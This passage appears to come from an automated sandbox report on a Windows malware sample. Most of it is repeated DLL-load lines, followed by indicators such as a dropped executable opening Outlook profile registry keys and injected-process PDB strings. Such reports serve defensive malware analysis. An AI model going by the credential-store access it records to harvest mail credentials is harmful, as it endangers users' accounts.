                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe, Section loaded: ??.dll
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe, Section loaded: winmm.dll
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
                    Source: Window Recorder, Window detected: More than 3 window changes detected
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                    Source: C6dAUcOA6M.exe, Static file information: File size 1226752 > 1048576
                    Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: alg.exe, 00000011.00000003.2254909034.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: aymtmquJ.pif, 0000000B.00000003.1450910858.000000001BE00000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 00000011.00000003.2308042218.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2318454628.0000000000400000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2306735952.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: alg.exe, 00000011.00000003.1910966205.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: alg.exe, 00000011.00000003.2074539308.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: alg.exe, 00000011.00000003.2074539308.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: ADelRCP_Exec.pdb source: alg.exe, 00000011.00000003.2091776110.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: PresentationFontCache.pdb source: Native_neworigin.exe, 0000000D.00000003.1572667658.0000000006450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.1689208067.0000000001620000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: mavinject32.pdbGCTL source: alg.exe, 00000011.00000003.2359192266.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2355715441.00000000014A0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: _.pdb source: Native_neworigin.exe, 0000000D.00000002.1760923102.0000000005120000.00000004.08000000.00040000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000003.1468315609.00000000007E2000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000003.1460268947.000000000078D000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1712231989.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1746628471.0000000003EE5000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: crashreporter.pdb source: alg.exe, 00000011.00000003.2498331114.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: plugin-container.pdb source: alg.exe, 00000011.00000003.2595573568.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 00000011.00000003.2052085164.0000000001590000.00000004.00001000.00020000.00000000.sdmp
